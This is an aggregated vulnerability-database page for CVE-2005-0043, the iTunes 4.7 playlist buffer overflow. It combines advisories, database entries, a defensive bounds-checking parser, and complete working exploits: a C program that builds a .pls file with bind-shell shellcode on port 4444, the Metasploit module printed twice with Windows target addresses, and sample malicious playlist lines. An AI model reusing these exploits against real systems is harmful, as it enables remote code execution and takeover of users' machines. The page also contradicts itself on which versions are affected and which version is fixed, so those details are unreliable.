CVE-2005-0043
CVSS7.5
Published: 2005-05-02 00:00:00
Revised: 2017-07-10 21:32:04

[Original] Buffer overflow in Apple iTunes 4.7 allows remote attackers to execute arbitrary code via a long URL in (1) .m3u or (2) .pls playlist files.


[CNNVD] Apple iTunes m3u/pls playlist remote buffer overflow vulnerability (CNNVD-200505-661)

        Apple iTunes is a media player application.
        Apple iTunes has a flaw in its handling of m3u or pls playlist files; a remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the iTunes process.
        If a malicious m3u or pls playlist file is constructed, loading it in iTunes triggers a buffer overflow or executes arbitrary instructions.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0043
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0043
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-661
(official data source) CNNVD

- Other links and resources

http://lists.apple.com/archives/security-announce/2005/Jan/msg00000.html
(PATCH)  APPLE  APPLE-SA-2005-01-11
http://securitytracker.com/id?1012839
(UNKNOWN)  SECTRACK  1012839
http://www.idefense.com/application/poi/display?id=180&type=vulnerabilities
(PATCH)  IDEFENSE  20050113 Apple iTunes Playlist Parsing Buffer Overflow Vulnerability
http://www.kb.cert.org/vuls/id/377368
(VENDOR_ADVISORY)  CERT-VN  VU#377368
http://www.securityfocus.com/bid/12238
(UNKNOWN)  BID  12238
https://exchange.xforce.ibmcloud.com/vulnerabilities/18851
(UNKNOWN)  XF  itunes-m3u-pls-bo(18851)

- Vulnerability information

Apple iTunes m3u/pls playlist remote buffer overflow vulnerability
High risk  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade to fix this security issue; download link:
        http://www.apple.com/itunes/download/

- Vulnerability information (758)

Apple iTunes Playlist Local Parsing Buffer Overflow Exploit (EDBID:758)
osX remote
2005-01-16 Verified
0 nemo
N/A
/*
 * PoC for iTunes on OS X 10.3.7
 * -( nemo@felinemenace.org )-
 *
 * Generates a .pls file, when loaded in iTunes it
 * binds a shell to port 4444.
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( nemo@felinemenace.org )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$ open foo.pls
 * -[nemo@gir:~]$ nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 *
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */

#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* memset() */
#include <strings.h>  /* bcopy() */

#define BUFSIZE 1598 + 4

char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
        int n,*p;
        unsigned char * q;
        char buf[BUFSIZE];
        FILE *pls;
        int offset=0x3DA8;
        char playlist[] = {
                "[playlist]\n"
                "NumberOfEntries=1\n"
                "File1=http://"
        };
        printf("-( fm-eyetewnz )-\n");
        printf("-( nemo@felinemenace.org )-\n");
        memset(buf,'\x60',BUFSIZE);
        bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
        q = buf + sizeof(buf) - 5;
        p = (int *)q;
        if(!(av[1])) {
                printf("usage: %s <filename (.pls)> [offset]\n",*av);
                exit(1);
        }
        if(av[2])
                offset = atoi(av[2]);
        *p = (0xc0000000 - offset);// 0xbfffc258;
        if(!(pls = fopen(*(av+1),"w+"))) {
                printf("error opening file: %s.\n", *(av +1));
                exit(1);
        }
        printf("Creating file: %s.\n",*(av+1));
        printf("Bindshell on port: 4444\n");
        fwrite(playlist,sizeof(playlist) - 1,1,pls);
        fwrite(buf,sizeof(buf) - 1,1,pls);
        fclose(pls);
        return 0;
}

// milw0rm.com [2005-01-16]
		

- Vulnerability information (16562)

Apple ITunes 4.7 Playlist Buffer Overflow (EDBID:16562)
windows local
2010-05-09 Verified
0 metasploit
N/A
##
# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple ITunes 4.7 Playlist Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Apple ITunes 4.7
				build 4.7.0.42. By creating a URL link to a malicious PLS
				file, a remote attacker could overflow a buffer and execute
				arbitrary code. When using this module, be sure to set the
				URIPATH with an extension of '.pls'.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0043' ],
					[ 'OSVDB', '12833' ],
					[ 'BID', '12238' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English SP4',	{ 'Ret' => 0x75033083 } ],
					[ 'Windows XP Pro English SP2',		{ 'Ret' => 0x77dc2063 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 11 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		cruft   = rand(9).to_s

		sploit =  make_nops(2545) + payload.encoded + [target.ret].pack('V')

		# Build the HTML content
		content =  "[playlist]\r\n" + "NumberOfEntries=#{cruft}\r\n"
		content << "File#{cruft}=http://#{sploit}"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content, { 'Content-Type' => 'text/html' })

		# Handle the payload
		handler(cli)
	end

end
		

- Vulnerability information (F83127)

Apple ITunes 4.7 Playlist Buffer Overflow (PacketStormID:F83127)
2009-11-26 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
apple
CVE-2005-0043

This Metasploit module exploits a stack overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple ITunes 4.7 Playlist Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Apple ITunes 4.7
				build 4.7.0.42. By creating a URL link to a malicious PLS
				file, a remote attacker could overflow a buffer and execute
				arbitrary code. When using this module, be sure to set the 
				URIPATH with an extension of '.pls'.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC', 
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2005-0043' ],
					[ 'OSVDB', '12833' ],
					[ 'BID', '12238' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English SP4',	{ 'Ret' => 0x75033083 } ],
					[ 'Windows XP Pro English SP2',		{ 'Ret' => 0x77dc2063 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 11 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		cruft   = rand(9).to_s
		
		sploit =  make_nops(2545) + payload.encoded + [target.ret].pack('V') 

		# Build the HTML content
		content =  "[playlist]\r\n" + "NumberOfEntries=#{cruft}\r\n" 
		content << "File#{cruft}=http://#{sploit}"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content, { 'Content-Type' => 'text/html' })
		
		# Handle the payload
		handler(cli)		
	end

end
    

- Vulnerability information (F35698)

Apple Security Advisory 2005-01-11 (PacketStormID:F35698)
2005-01-12 00:00:00
Apple,Sean de Regge  apple.com
advisory,overflow,arbitrary
CVE-2005-0043

iTunes 4.7.1 fixes a buffer overflow in the parsing of m3u and pls playlist files that could allow earlier versions of iTunes to crash and execute arbitrary code.

APPLE-SA-2005-01-11 iTunes 4.7.1

iTunes 4.7.1 is now available and delivers the following security
enhancement:

CVE-ID:  CAN-2005-0043

Impact:  Malicious playlists can cause iTunes to crash and could
execute arbitrary code

Description:  iTunes supports several common playlist formats.
iTunes 4.7.1 fixes a buffer overflow in the parsing of m3u and pls
playlist files that could allow earlier versions of iTunes to crash
and execute arbitrary code.  Credit to Sean de Regge
(seanderegge[at]hotmail.com) for discovering this issue, and to
iDEFENSE Labs for reporting it to us.

Available for:  Mac OS X, Microsoft Windows XP, Microsoft Windows
2000

iTunes 4.7.1 may be obtained from the Software Update pane in System
Preferences, or Apple's iTunes download site:
http://www.apple.com/itunes/download/

The download file is named: "iTunes4.7.1.dmg"
Its SHA-1 digest is:  2ae8c815f18756c24dfbc1ac7d837b75b828b92a

Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798

This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/security_pgp.html


- Vulnerability information

12833
Apple iTunes m3u/pls Playlist Overflow
Local Access Required Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

A local overflow exists in iTunes. iTunes fails to perform proper bounds checking on m3u/pls playlists, which may result in a buffer overflow. A remote attacker can create a specially crafted m3u/pls playlist which when executed by a local user can cause a buffer overflow resulting in a loss of integrity and/or availability.

- Timeline

2005-01-11 Unknown
2005-01-15 Unknown

- Solution

Upgrade to version 4.7.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

Apple ITunes Playlist Buffer Overflow Vulnerability
Boundary Condition Error 12238
Yes No
2005-01-11 12:00:00 2009-07-12 09:27:00
Discovery is credited to Sean de Regge.

- Affected program versions

Apple iTunes 4.7
Apple iTunes 4.6
Apple iTunes 4.5
Apple iTunes 4.2 .72
Apple iTunes 4.7.1

- Unaffected program versions

Apple iTunes 4.7.1

- Vulnerability discussion

Apple iTunes is prone to a buffer overflow vulnerability. This issue is exposed when the application parses 'm3u' and 'pls' playlist files. As these files may originate from an external source, this issue is considered remotely exploitable.

If the vulnerability is successfully exploited, it will result in execution of arbitrary code in the context of the user running the application.

- Exploitation

The following examples are available:
An example malicious .pls file with a long URL:

[playlist]
NumberOfEntries=1
File1=http://[A x 3045]1234

An example malicious .m3u file with a long URL:

http://[A x 3045]1234

The exploit 'fm-eyetewnz.c' has been released to the public by nemo <nemo@felinemenace.org>:

An additional exploit 'atmaca.c' has been released by atmaca <atmaca@icqmail.com>:
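As an added defender's example (not code from the page, from Apple, or from any of the exploits above), this C snippet shows the missing bounds check the advisory describes: a .pls "FileN=" parser that measures the URL before copying it and rejects overlong entries, run against a constructed playlist shaped like the trigger file quoted above (File1=http://[A x n]1234). URL_MAX, the function names and the constructed sample are assumptions for illustration, not iTunes internals.

```c
#include <stdlib.h>
#include <string.h>
#define URL_MAX 2048  /* assumed per-entry URL limit (a policy value, not iTunes') */
enum pls_status { PLS_OK, PLS_NOT_ENTRY, PLS_TOO_LONG };
struct pls_scan { int accepted; int rejected; };

/* Parse one "FileN=<url>" line into out[outsz]. The length check before the
 * copy is the bound the advisory says iTunes 4.7 lacked: overlong URLs are
 * rejected instead of being written past the end of the buffer. */
enum pls_status parse_pls_file_line(const char *p, char *out, size_t outsz)
{
    if (strncmp(p, "File", 4) != 0) return PLS_NOT_ENTRY;
    p += 4;
    if (*p < '0' || *p > '9') return PLS_NOT_ENTRY;
    while (*p >= '0' && *p <= '9') p++;
    if (*p++ != '=') return PLS_NOT_ENTRY;
    size_t len = strcspn(p, "\r\n");        /* URL runs to end of line */
    if (len >= outsz) return PLS_TOO_LONG;
    memcpy(out, p, len);
    out[len] = '\0';
    return PLS_OK;
}

/* Walk every line of a playlist, counting accepted and rejected entries. */
struct pls_scan scan_pls(const char *playlist)
{
    struct pls_scan r = { 0, 0 };
    char url[URL_MAX + 1];
    for (const char *line = playlist; *line; ) {
        enum pls_status s = parse_pls_file_line(line, url, sizeof url);
        if (s == PLS_OK) r.accepted++;
        else if (s == PLS_TOO_LONG) r.rejected++;
        line += strcspn(line, "\n");
        if (*line == '\n') line++;
    }
    return r;
}

/* Constructed sample shaped like the trigger quoted on the page,
 * File1=http://[A x n_a]1234: build it, scan it, free it. */
struct pls_scan scan_sample(size_t n_a)
{
    const char *head = "[playlist]\nNumberOfEntries=1\nFile1=http://";
    size_t hl = strlen(head);
    char *pls = malloc(hl + n_a + 6);       /* room for "1234\n" and NUL */
    memcpy(pls, head, hl);
    memset(pls + hl, 'A', n_a);
    strcpy(pls + hl + n_a, "1234\n");
    struct pls_scan r = scan_pls(pls);
    free(pls);
    return r;
}
```

With n_a = 3045 (the length quoted in the BID entry) the entry is rejected and nothing is copied; a short host part is accepted, and the boundary sits exactly at URL_MAX bytes of URL.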

- Solution

Apple has released iTunes 4.7 to address this vulnerability. Mac OS X users may automatically apply this update through the Software Update pane in System Preferences.

Manual updates for Mac OS X and Windows are also available through the iTunes download page.


Apple iTunes 4.2 .72

Apple iTunes 4.5

Apple iTunes 4.6

Apple iTunes 4.7
